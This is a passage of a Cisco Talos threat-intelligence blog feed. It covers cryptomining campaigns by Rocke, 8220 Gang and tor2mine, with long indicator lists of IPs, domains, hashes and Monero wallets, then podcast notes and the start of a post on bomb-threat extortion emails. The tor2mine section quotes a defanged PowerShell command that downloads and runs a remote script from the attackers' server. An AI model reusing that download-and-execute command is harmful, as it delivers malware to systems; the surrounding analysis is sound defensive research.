href="https://www.google.com/url?q=https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/&amp;sa=D&amp;ust=1545149724754000">Drupal</a> content management system, <a href="https://www.google.com/url?q=https://ti.360.net/blog/articles/8220-mining-gang-in-china/&amp;sa=D&amp;ust=1545149724756000">Hadoop YARN, Redis, Weblogic and Couch</a><a href="https://www.google.com/url?q=https://ti.360.net/blog/articles/8220-mining-gang-in-china/&amp;sa=D&amp;ust=1545149724757000">DB</a>. Besides leveraging malicious bash scripts, Git repositories and image sharing services, as in whatMiner, 8220 Mining Group also carried out a long-lasting campaign using malicious <a href="https://www.google.com/url?q=https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers&amp;sa=D&amp;ust=1545149724758000">Docker images</a>. 8220 Mining Group was able to <a href="https://www.google.com/url?q=https://www.fortinet.com/blog/threat-research/yet-another-crypto-mining-botnet.html&amp;sa=D&amp;ust=1545149724759000">amass</a> nearly $200,000 worth of Monero through their campaigns. <br /><br />There were some similarities to the TTPs used by Rocke and 8220 Mining Group in these campaigns. The actors downloaded a malicious file "logo*.jpg" (very similar to Rocke's use of malicious scripts under the file name of "logo*.jpg payloads), which gets executed through the bash shell to deliver XMRig. The actor also employed malicious scripts hosted on .tk TLDs, Pastebin sites, and Git repositories, which we have also observed Rocke employing.<br /><br /><h4></h4><h4>tor2mine</h4>Over the past few years, Talos has been monitoring accesses for tor2web services, which serve as a bridge between the internet and the Tor network, a system that allows users to enable anonymous communication. These services are useful for malware authors because they eliminate the need for malware to communicate with the Tor network directly, which is suspicious and may be blocked, and allow the C2 server's IP address to be hidden. <br /><br />Recently, while searching through telemetry data, we observed malicious activity that leveraged a tor2web gateway to proxy communications to a hidden service for a C2: qm7gmtaagejolddt[.]onion[.]to. <br /><br />It is unclear how the initial exploitation occurs, but at some point in the exploitation process, a PowerShell script is downloaded and executed to install follow-on malware onto the system:<br /><br /><blockquote class="tr_bq">C:\\Windows\\System32\\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://107[.]181[.]187[.]132/v1/check1.ps1'))</blockquote><br />We identified additional malware on this IP, which belongs to Total Server Solutions LLC. They appear to include 64-bit and 32-bit variants of XMRigCC — a variant of the XMRig miner, Windows executable versions of publically available EternalBlue/EternalRomance exploit scripts,an open-source TCP port scanner, and shellcode that downloads and executes a malicious payload from the C2. Additional scripts leverage JavaScript, VBScript, PowerShell and batch scripts to avoid writing executables to the disk. <br /><br />We began to research the malware and infrastructure used in this campaign. We observed <a href="https://www.google.com/url?q=https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron&amp;sa=D&amp;ust=1545149724777000">previous research</a>&nbsp;on a similar campaign. This actor was exploiting CVE-2018-11776, an Apache Struts 2 namespace vulnerability. The actor also relied on an IP hosted on Total Server Solutions LLC (107[.]181[.]160[.]197). They also employed a script, "/win/checking-test.hta," that was almost identical to one we saw hosted on the tor2mine actors C2, "check.hta:"<br /><br />/win/checking-test.hta from <a href="https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron">previous campaign</a><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-P0BM1YbmglE/XBkTUfYruyI/AAAAAAAABiE/cdM11HTIeMU_BLbLvaIufOkl8AlVgpphACLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="442" data-original-width="1260" height="224" src="https://1.bp.blogspot.com/-P0BM1YbmglE/XBkTUfYruyI/AAAAAAAABiE/cdM11HTIeMU_BLbLvaIufOkl8AlVgpphACLcBGAs/s640/image3.png" width="640" /></a></div>check.hta<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-xCD4IEajoAw/XBkTbbLPdpI/AAAAAAAABiM/iFRi_JfkjaYFKKbvu9WMvVdk-9x9_2KowCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="360" data-original-width="923" height="248" src="https://4.bp.blogspot.com/-xCD4IEajoAw/XBkTbbLPdpI/AAAAAAAABiM/iFRi_JfkjaYFKKbvu9WMvVdk-9x9_2KowCLcBGAs/s640/image4.png" width="640" /></a></div>This actor dropped XMRigCC as a payload, mining to eu[.]minerpool[.]pw, as well. Both campaigns additionally relied on the XHide Process-faker tool. <br /><br />Similarly, in <a href="https://www.google.com/url?q=https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulnerability-exploited-deliver-double-monero-miner-payloads/&amp;sa=D&amp;ust=1545149724785000">February 2018</a>, Trend Micro published a report on an actor exploiting an Oracle WebLogic WLS-WSAT vulnerability to drop 64-bit and 32-bit variants of XMRig. The actors used many similar supporting scripts that we observed during the tor2web campaigns, and also used a C2 hosted on Total Server Solutions LLC (hxxp://107[.]181[.]174[.]248). They also mined to eu[.]minerpool[.]pw. <br /><br />This malware was developed in Python and then changed to ELF executables using the PyInstaller tool for distribution. This is the same technique we observed in a Rocke campaign.<br /><br /><h4></h4><h4>Conclusion</h4>Through tracking the wallets of these groups, we estimate that they hold and have made payments totaling around 1,200 Monero. Based on public reporting, these groups combined had earned hundreds of thousands of dollars worth of cryptocurrency. However, it is difficult to ascertain the exact amount they made since the value of Monero is very volatile and it is difficult to tell the value of the currency when it was sold. We were also unable to track holdings and payments for certain kinds of wallets, such as MinerGate.<br /><br />The value of Monero has dramatically declined in the past few months. Talos has observed less activity from these actors in our honeypots since November, although cryptocurrency-focused attacks from other actors continue. <br /><br />There remains the possibility that with the value of cryptocurrencies so low, threat actors will begin delivering different kinds of payloads. For example, Rocke has been observed developing new malware with destructive capabilities that pose as ransomware. However, Rocke’s GitHub page shows that, as of early November, they were continuing to fork mining-focused repositories, including a static build of XMRig.<br /><br />Talos will continue to monitor these groups, as well as cryptocurrency mining-focused attacks in general, to assess what changes, if any, arise from the decline in value of cryptocurrencies.<br /><br /><h4></h4><h4>Coverage</h4>For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: <a href="https://www.google.com/url?q=https://talosintelligence.com/resources/59&amp;sa=D&amp;ust=1545149724800000">Blocking Cryptocurrency Mining Using Cisco Security Products</a><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-kLMMs2ca1vw/XBkTiaGFCAI/AAAAAAAABiQ/BnUOME636oc66-Lx9QJ2QKK2lbUlHb7rgCLcBGAs/s1600/image1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="269" data-original-width="320" src="https://3.bp.blogspot.com/-kLMMs2ca1vw/XBkTiaGFCAI/AAAAAAAABiQ/BnUOME636oc66-Lx9QJ2QKK2lbUlHb7rgCLcBGAs/s1600/image1.png" /></a></div><br />Advanced Malware Protection (<a href="https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/advanced-malware-protection&amp;sa=D&amp;ust=1545149724807000">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br />Cisco Cloud Web Security (<a href="https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html&amp;sa=D&amp;ust=1545149724809000">CWS</a>) or<a href="https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html&amp;sa=D&amp;ust=1545149724810000"> Web Security Appliance (WSA</a>) web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br />Network Security appliances such as<a href="https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/firewalls/index.html&amp;sa=D&amp;ust=1545149724813000"> Next-Generation Firewall (NGFW</a>),<a href="https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html&amp;sa=D&amp;ust=1545149724814000"> Next-Generation Intrusion Prevention System (NGIPS</a>), and<a href="https://www.google.com/url?q=https://meraki.cisco.com/products/appliances&amp;sa=D&amp;ust=1545149724816000"> Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href="https://www.google.com/url?q=https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html&amp;sa=D&amp;ust=1545149724818000">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href="https://www.google.com/url?q=https://umbrella.cisco.com/&amp;sa=D&amp;ust=1545149724820000">Umbrella</a>, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.<br /><br />Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href="https://www.google.com/url?q=https://www.snort.org/products&amp;sa=D&amp;ust=1545149724823000">Snort.org</a>.<br /><br /><h3>IOCs</h3><h4></h4><h4>Rocke</h4>IPs:<br />121[.]126[.]223[.]211<br />142[.]44[.]215[.]177<br />144[.]217[.]61[.]147<br />118[.]24[.]150[.]172<br />185[.]133[.]193[.]163<br /><br />Domains:<br />xmr.enjoytopic[.]tk<br />d.paloaltonetworks[.]tk<br />threatpost[.]tk<br />3g2upl4pq6kufc4m[.]tk<br />scan.3g2upl4pq6kufc4m[.]tk<br />e3sas6tzvehwgpak[.]tk<br />sample.sydwzl[.]cn<br />blockbitcoin[.]com<br />scan.blockbitcoin[.]tk<br />dazqc4f140wtl[.]cloudfront[.]net<br />d3goboxon32grk2l[.]tk<br />enjoytopic[.]tk<br />realtimenews[.]tk<br />8282[.]space<br />3389[.]space<br />svss[.]space<br />enjoytopic[.]esy[.]es<br />lienjoy[.]esy[.]es<br />d3oxpv9ajpsgxt[.]cloudfront[.]net<br />d3lvemwrafj7a7[.]cloudfront[.]net<br />d1ebv77j9rbkp6[.]enjoytopic[.]com<br />swb[.]one<br />d1uga3uzpppiit[.]cloudfront[.]net<br />emsisoft[.]enjoytopic[.]tk<br />ejectrift[.]censys[.]xyz<br />scan[.]censys[.]xyz<br />api[.]leakingprivacy[.]tk<br />news[.]realnewstime[.]xyz<br />scan[.]realnewstime[.]xyz<br />news[.]realtimenews[.]tk<br />scanaan[.]tk<br />www[.]qicheqiche[.]com<br /><br />URLs:<br />hxxps://github[.]com/yj12ni<br />hxxps://github[.]com/rocke<br />hxxps://github[.]com/freebtcminer/<br />hxxps://github[.]com/tightsoft<br />hxxps://raw[.]githubusercontent[.]com/ghostevilxp<br />hxxp://www[.]qicheqiche[.]com<br />hxxp://123[.]206[.]13[.]220:8899<br />hxxps://gitee[.]com/c-888/<br />hxxp://gitlab[.]com/c-18<br />hxxp://www[.]ssvs[.]space/root[.]bin <br />hxxp://a[.]ssvs[.]space/db[.]sh<br />hxxp://a[.]ssvs[.]space/cf[.]cf<br />hxxp://a[.]ssvs[.]space/pluto<br />hxxp://ip[.]ssvs[.]space/xm64<br />hxxp://ip[.]ssvs[.]space/wt[.]conf <br />hxxp://ip[.]ssvs[.]space/mr[.]sh <br />hxxp://a[.]ssvs[.]space/logo[.]jpg <br />hxxp://a[.]sydwzl[.]cn/root[.]bin <br />hxxp://a[.]sydwzl[.]cn/x86[.]bin<br />hxxp://a[.]sydwzl[.]cn/bar[.]sh<br />hxxp://a[.]sydwzl[.]cn/crondb <br />hxxp://a[.]sydwzl[.]cn/pools[.]txt<br />hxxps://pastebin[.]com/raw/5bjpjvLP<br />hxxps://pastebin[.]com/raw/Fj2YdETv<br />hxxps://pastebin[.]com/raw/eRkrSQfE<br />hxxps://pastebin[.]com/raw/Gw7mywhC<br />hxxp://thyrsi[.]com/t6/387/1539580368x-1566688371[.]jpg<br />hxxp://thyrsi[.]com/t6/387/1539579140x1822611263[.]jpg<br />hxxp://thyrsi[.]com/t6/387/1539581805x1822611359[.]jpg<br />hxxp://thyrsi[.]com/t6/387/1539592750x-1566688347[.]jpg<br />hxxp://thyrsi[.]com/t6/373/1537410750x-1566657908[.]jpg<br />hxxp://thyrsi[.]com/t6/373/1537410304x-1404764882[.]jpg<br />hxxp://thyrsi[.]com/t6/377/1538099301x-1404792622[.]jpg<br />hxxp://thyrsi[.]com/t6/362/1535175343x-1566657675[.]jpg<br />hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408<br /><br />SHA-256:<br />55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b root.bin<br />00e1b4874f87d124b465b311e13565a813d93bd13d73b05e6ad9b7a08085b683 root.bin<br />cdaa31af1f68b0e474ae1eafbf3613eafae50b8d645fef1e64743c937eff31b5 db.sh<br />959230efa68e0896168478d3540f25adf427c7503d5e7761597f22484fc8a451 cf.cf<br />d11fa31a1c19a541b51fcc3ff837cd3eec419403619769b3ca69c4137ba41cf3 pluto/xm64<br />da641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08 root.bin<br />2914917348b91c26ffd703dcef2872115e53dc0b71e23ce40ea3f88215fb2b90 wt.conf<br />b1c585865fdb16f3696626ef831b696745894194be9138ac0eb9f6596547eed9 mr.sh<br />7de435da46bf6bcd1843410d05c017b0306197462b0ba1d8c84d6551192de259 root.bin<br />904261488b24dfec2a3c8dee34c12e0ae2cf4722bd06d69af3d1458cd79e8945 logo.jpg<br />f792db9a05cde2eac63c262735d92f10e2078b6ec299ce519847b1e089069271 root.bin<br />dcf2b7bf7f0c8b7718e47b0d7269e0d09bb1bdbf6d3248a53ff0e1c9ea5aa38d x86.bin<br />3074b307958f6b31448006cad398b23f12119a7d0e51f24c5203a291f9e5d0ec bar.sh<br />a598aa724c45b2d8b98ec9bc34b83f21b7ae73d68d030476ebd9d89fc06afe58 cron.db<br />74c84e47463fad4128bd4d37c4164fb58e4d7dcd880992fad16f79f20995e07e pools.txt<br /><br />Samples making DNS requests for sydwzl[.]cn and sbss[.]f3322[.]net:<br />17c8a1d0e981386730a7536a68f54a7388ed185f5c63aa567d212dc672cf09e0<br />4347d37b7ea18caacb843064dc31a6cda3c91fa7feb4d046742fd9bd985a8c86<br /><br />Wallets<br />rocke@live.cn<br />44NU2ZadWJuDyVqKvzapAMSe6zR6JE99FQXh2gG4yuANW5fauZm1rPuTuycCPX3D7k2uiNc55SXL3TX8fHrbb9zQAqEM64W <br />44FUzGBCUrwAzA2et2CRHyD57osHpmfTHAXzbqn2ycxtg2bpk792YCSLU8BPTciVFo9mowjakCLNg81WwXgN2GEtQ4uRuN3 <br />45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV <br />88RiksgPZR5C3Z8B51AQQQMy3zF9KFN7zUC5P5x2DYCFa8pUkY3biTQM6kYEDHWpczGMe76PedzZ6KTsrCDVWGXNRHqwGto<br /><br /><h4>8220 Gang</h4>45[.]32[.]39[.]40:8220<br />45[.]77[.]24[.]16<br />54[.]37[.]57[.]99:8220<br />67[.]21[.]81[.]179:8220<br />67[.]231[.]243[.]10:8220<br />98[.]142[.]140[.]13:8220<br />98[.]142[.]140[.]13:3333<br />98[.]142[.]140[.]13:8888<br />104[.]129[.]171[.]172:8220<br />104[.]225[.]147[.]196:8220<br />128[.]199[.]86[.]57:8220<br />142[.]4[.]124[.]50:8220<br />142[.]4[.]124[.]164:8220<br />158[.]69[.]133[.]17:8220<br />158[.]69[.]133[.]18:8220<br />158[.]69[.]133[.]20:3333<br />162[.]212[.]157[.]244:8220<br />165[.]227[.]215[.]212:8220<br />185[.]82[.]218[.]206:8220<br />192[.]99[.]142[.]226:8220<br />192[.]99[.]142[.]227<br />192[.]99[.]142[.]232:8220<br />192[.]99[.]142[.]235:8220<br />192[.]99[.]142[.]240:8220<br />192[.]99[.]142[.]248:8220<br />192[.]99[.]142[.]249:3333<br />192[.]99[.]142[.]251:80<br />192[.]99[.]56[.]117:8220<br />195[.]123[.]224[.]186:8220<br />198[.]181[.]41[.]97:8220<br />202[.]144[.]193[.]110:3333<br />hxxps://github[.]com/MRdoulestar/whatMiner<br /><br />1e43eac49ff521912db16f7a1c6b16500f7818de9f93bb465724add5b4724a13<br />e2403b8198fc3dfdac409ea3ce313bbf12b464b60652d7e2e1bc7d6c356f7e5e<br />31bae6f19b32b7bb7188dd4860040979cf6cee352d1135892d654a4df0df01c1<br />cb5936e20e77f14ea7bee01ead3fb9d3d72af62b5118898439d1d11681ab0d35<br />cfdee84680d67d4203ccd1f32faf3f13e6e7185072968d5823c1200444fdd53e<br />efbde3d4a6a495bb7d90a266ab1e49879f8ac9c2378c6f39831a06b6b74a6803<br />384abd8124715a01c238e90aab031fb996c4ecbbc1b58a67d65d750c7ed45c52<br /><br />Samples associated with whatMiner:<br />f7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c<br />1f5891e1b0bbe75a21266caee0323d91f2b40ecc4ff1ae8cc8208963d342ecb7<br />3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04<br />241916012cc4288efd2a4b1f16d1db68f52e17e174425de6abee4297f01ec64f<br />3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04<br /><br />Wallets<br />41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo <br />4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg <br />46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S<br /><br /><h4></h4><h4>Tor2mine</h4>107[.]181[.]160[.]197<br />107[.]181[.]174[.]248<br />107[.]181[.]187[.]132<br />asq[.]r77vh0[.]pw<br />194[.]67[.]204[.]189<br />qm7gmtaagejolddt[.]onion[.]to<br />res1[.]myrms[.]pw<br />hxxps://gitlab[.]com/Shtrawban<br />rig[.]zxcvb[.]pw<br />back123[.]brasilia[.]me<br /><br />91853a9cdbe33201bbd9838526c6e5907724eb28b3a3ae8b3e0126cee8a46639 32.exe<br />44586883e1aa03b0400a8e394a718469424eb8c157e8760294a5c94dad3c1e19 64.exe<br />3318c2a27daa773e471c6220b7aed4f64eb6a49901fa108a1519b3bbae81978f 7.exe<br />c3c3eb5c8c418164e8da837eb2fdd66848e7de9085aec0fca4bb906cd69c654e 8.exe<br />4238a0442850d3cd40f8fb299e39a7bd2a94231333c83a98fb4f8165d89f0f7f check1.ps1<br />904c7860f635c95a57f8d46b105efc7ec7305e24bd358ac69a9728d0d548011a checker.bat<br />4f9aeb3bb627f3cad7d23b9e0aa8e2e3b265565c24fec03282d632abbb7dac33 check.hta<br />af780550bc8e210fac5668626afdc9f8c7ff4ef04721613f4c72e0bdf6fbbfa3 clocal.hta<br />cc7e6b15cf2b6028673ad472ef49a80d087808a45ad0dcf0fefc8d1297ad94b5 clocal.ps1<br />ee66beae8d85f2691e4eb4e8b39182ea40fd9d5560e30b88dc3242333346ee02 cnew.hta<br />a7d5911251c1b4f54b24892e2357e06a2a2b01ad706b3bf23384e0d40a071fdb del.bat<br />0f6eedc41dd8cf7a4ea54fc89d6dddaea88a79f965101d81de2f7beb2cbe1050 func.php<br />e0ca80f0df651b1237381f2cbd7c5e834f0398f6611a0031d2b461c5b44815fc localcheck.bat<br />b2498165df441bc33bdb5e39905e29a5deded7d42f07ad128da2c1303ad35488 scanner.ps1<br />18eda64a9d79819ec1a73935cb645880d05ba26189e0fd5f2fca0a97f3f019a9 shell.bin<br />1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc ss.exe<br />112e3d3bb75e2bf88bd364a42a40434148d781ee89d29c66d17a5a154615e4b1 upd2.ps1<br />e1565b21f9475b356481ddd1dcd92cdbed4f5c7111455df4ef16b82169af0577 upd.hta<br />61185ddd3e020a3dfe5cb6ed68069052fe9832b57c605311a82185be776a3212 win10.ps1<br />f1b55302d81f6897e4b2429f2efdad1755e6e0f2e07a1931bce4ecf1565ed481 zazd.bat<br />cce61d346022a0192418baa7aff56ab885757f3becd357967035dd6a04bb6abf z.exe<br /><br /><h4></h4><h4>Uncategorized groups</h4>188[.]166[.]38[.]137<br />91[.]121[.]87[.]10<br />94[.]23[.]206[.]130<br /><br />46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava <br />44dSUmMLmqUFTWjv8tcTvbQbSnecQ9sAUT5CtbwDFcfwfSz92WwG97WahMPBdGtXGu4jWFgNtTZrbAkhFYLDFf2GAwfprEg<img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/DemsFFZIKpI" height="1" width="1" alt=""/>2018-12-18T11:33:11.729-05:000https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.htmlBeers with Talos EP 43: Espionage, Encryption, and CISO Square Onehttp://feedproxy.google.com/~r/feedburner/Talos/~3/bWRowfEFhZw/beers-with-talos-ep-43-espionage.htmlbeers with talosMalwaremobilepodcastnoreply@blogger.com (Mitch Neff)Fri, 14 Dec 2018 11:46:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-1596456688903002367<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-AiSK3pQUuq4/XBfkoRJJLrI/AAAAAAAAE84/IPSwZtTkb-YGfh_4shvJ66YgcaFYYR1iACK4BGAYYCw/s1600/BWT_EP43_MattBubble.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-AiSK3pQUuq4/XBfkoRJJLrI/AAAAAAAAE84/IPSwZtTkb-YGfh_4shvJ66YgcaFYYR1iACK4BGAYYCw/s1600/BWT_EP43_MattBubble.jpg" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-syTSjAlQ2EU/Wnn7oGQRmrI/AAAAAAAAAMg/vMFSk35zsngnKM3izSOla6RSmylI07__QCLcBGAs/s1600/BWT_EP22_MattBubble.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br class="Apple-interchange-newline" /></a></div>Beers with Talos (BWT) Podcast Ep. #43 is now available. Download this episode and subscribe to Beers with Talos:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://4.bp.blogspot.com/-WLkU01IRCLw/WaWCg3YHpRI/AAAAAAAAAJA/nQ2rFarDFeAUBY4ncARRUVaNkMpBKC0KgCLcBGAs/s1600/itunes_button.png" /></a><a href="https://play.google.com/music/listen?u=0#/ps/Ikcmodkhrjtblk5yks47s5uqbca" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://2.bp.blogspot.com/-E-RSSZ9jbUY/WaWCkLGZnZI/AAAAAAAAAJE/Ciiz-Si4oA0cgR9tMGSGbT9336qrYuDeACLcBGAs/s1600/google_play_button.png" /></a><a href="https://www.stitcher.com/podcast/talos/beers-with-talos" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://1.bp.blogspot.com/-HIihRfTvh8I/WedjsKBFNhI/AAAAAAAAAKk/TCPBZoIkYdcW8QJujRtxxwjr70x4drh_wCEwYBhgL/s1600/stitcher_button.png" /></a></div><br />If iTunes and Google Play aren't your thing, click&nbsp;<a href="http://www.talosintelligence.com/podcast">here</a>.<br /><h3></h3><h3>Ep. #43 show notes:&nbsp;</h3>Recorded Dec. 7, 2018.<br /><br />Several of us are under the weather, but the show must go on. We did our best, as always. After running through some recent research, we spend a good bit of this EP looking through the lens of a recent breach at the first things a new security leader should get a handle on - what questions need to be answered? What information and practices are day-1 vital? We wrap up taking a look at a slew of vulns Talos uncovered in secure messaging apps.<br /><h3><a name='more'></a>The timeline:</h3><div><div><h4>The topics</h4>01:00 - Roundtable - we talk about the Reds, death by IoT lawnmowers, and the special Spam we get<br />12:40 - DNSpionage campaign and DNS redirection attacks<br />20:50 - Day One as CISO - Handling Inherited Risk as a Leader<br />50:45 - (in)Secure messenger apps - Ranging responses to vuln disclosures<br />1:02:36 - Closing thoughts and parting shots<br /><h4>The links</h4><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: &quot;arial&quot;; font-size: 10pt; font-style: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><a href="https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html" target="_blank">DNSpionage blog post</a></span></div><span id="docs-internal-guid-27e3f6da-7fff-31d5-6167-153af2aecc40"><span style="font-family: &quot;arial&quot;; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://blog.talosintelligence.com/2018/12/secureim.html" target="_blank">(in)Secure messaging blog post</a></span></span></div><div><br /></div><div>==========</div><div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><br />Featuring:&nbsp;<a href="https://twitter.com/security_craig">Craig Williams</a>&nbsp;(@Security_Craig),&nbsp;<a href="https://twitter.com/JoelEsler">Joel Esler</a>&nbsp;(@JoelEsler),&nbsp;<a href="https://twitter.com/kpyke">Matt Olney</a>&nbsp;(@kpyke) and&nbsp;<a href="https://twitter.com/EnglishLFC">Nigel Houghton</a>&nbsp;(@EnglishLFC).<br />Hosted by&nbsp;<a href="https://twitter.com/MitchNeff">Mitch Neff</a>&nbsp;(@MitchNeff).<br />Find all episodes&nbsp;<a href="http://cs.co/talospodcast">here</a>.<br /><br /><a href="http://cs.co/talositunes">Subscribe via iTunes</a>&nbsp;(and leave a review!)<br /><br />Check out the&nbsp;<a href="http://cs.co/talosresearch">Talos Threat Research Blog</a><br /><br />Subscribe to the&nbsp;<a href="http://cs.co/talosupdate">Threat Source newsletter</a><br /><br />Follow&nbsp;<a href="http://cs.co/talostwitter">Talos on Twitter</a><br /><br />Give us your feedback and suggestions for topics:<br /><a href="mailto:beerswithtalos@cisco.com">beerswithtalos@cisco.com</a></div></div></div></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/bWRowfEFhZw" height="1" width="1" alt=""/>2018-12-17T13:02:52.032-05:000https://blog.talosintelligence.com/2018/12/beers-with-talos-ep-43-espionage.htmlBitcoin Bomb Scare Associated with Sextortion Scammershttp://feedproxy.google.com/~r/feedburner/Talos/~3/rgRN4Fc1BGk/bitcoin-bomb-scare-associated-with.htmlbitcoinemailextortionsextortionspamnoreply@blogger.com (Jaeson Schultz)Fri, 14 Dec 2018 09:57:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-3201868334791227839<div dir="ltr" style="text-align: left;" trbidi="on"><small> <i>This blog was written by <a href="https://twitter.com/jaesonschultz">Jaeson Schultz</a>.</i></small><br /><br />Organizations across the country are on edge today after a flurry of phony bomb threats hit several public entities Thursday, such as universities, schools and news outlets, among others. The attackers distributed malicious emails claiming to have placed some type of explosive materials in the recipient's building. The emails stated the attackers would detonate these explosives unless the victim made a Bitcoin payment of several thousand dollars.<br /><br />Cisco Talos discovered that this campaign is actually an evolution of sextortion and extortion attacks that we <a href="https://www.google.com/url?q=https://blog.talosintelligence.com/2018/10/anatomy-of-sextortion-scam.html&amp;sa=D&amp;ust=1544812443433000">reported on in October</a>. The claims in the emails we've seen from this actor are completely false, yet they have caused untold amounts of damage as organizations have evacuated buildings and called upon law enforcement to investigate.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-U4W9nck2Bq8/XBPrPJj05vI/AAAAAAAAAj4/GF33Al8J-9YvhJ3L5V9LNRtxkYDhjGVDACLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="886" data-original-width="1182" height="478" src="https://2.bp.blogspot.com/-U4W9nck2Bq8/XBPrPJj05vI/AAAAAAAAAj4/GF33Al8J-9YvhJ3L5V9LNRtxkYDhjGVDACLcBGAs/s640/image2.png" width="640" /></a><br /><small>An example of the malicious, phony emails that attackers sent out to organizations across the U.S. yesterday.</small></div><br /><br /><a name='more'></a>What makes these particular extortion messages unique from other extortion scams we've monitored is that, previously, the attackers threatened only the individual — the attackers would threaten to expose sensitive data, or even attack the recipient physically, but there was never any threat of harm to a larger group of people, and certainly not the threat of a bomb.<br /><br />Talos has discovered 17 distinct Bitcoin addresses that were used in the bomb extortion attack. Only two of the addresses have a positive balance, both from transactions received Dec. 13, the day the attacks were distributed. However, the amounts of each transaction were under $1, so it is evident the victims in this case declined to pay the $20,000 extortion payment price demanded by the attackers.<br /><br />So far, all of the samples Talos has found to be associated with the bomb threat attack were sent from IP addresses belonging to the domain registrar and hosting company <a href="https://www.google.com/url?q=http://reg.ru&amp;sa=D&amp;ust=1544812443436000">reg.ru</a>, suggesting that the attackers in this case may have compromised credentials for domains that are hosted at this particular domain registrar. Multiple IPs involved in sending these bomb threats also sent various types of sextortion email that we saw in the previous campaign. In those cases, the attackers sent out emails claiming to have compromising videos of the victim and will release them to the public unless the attacker receives a Bitcoin payment.<br /><br />As of late yesterday, the bomb threat email attack morphed. The attackers have returned to their empty threats of harming the individual recipient. This time, they threaten to throw acid on the victim.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a 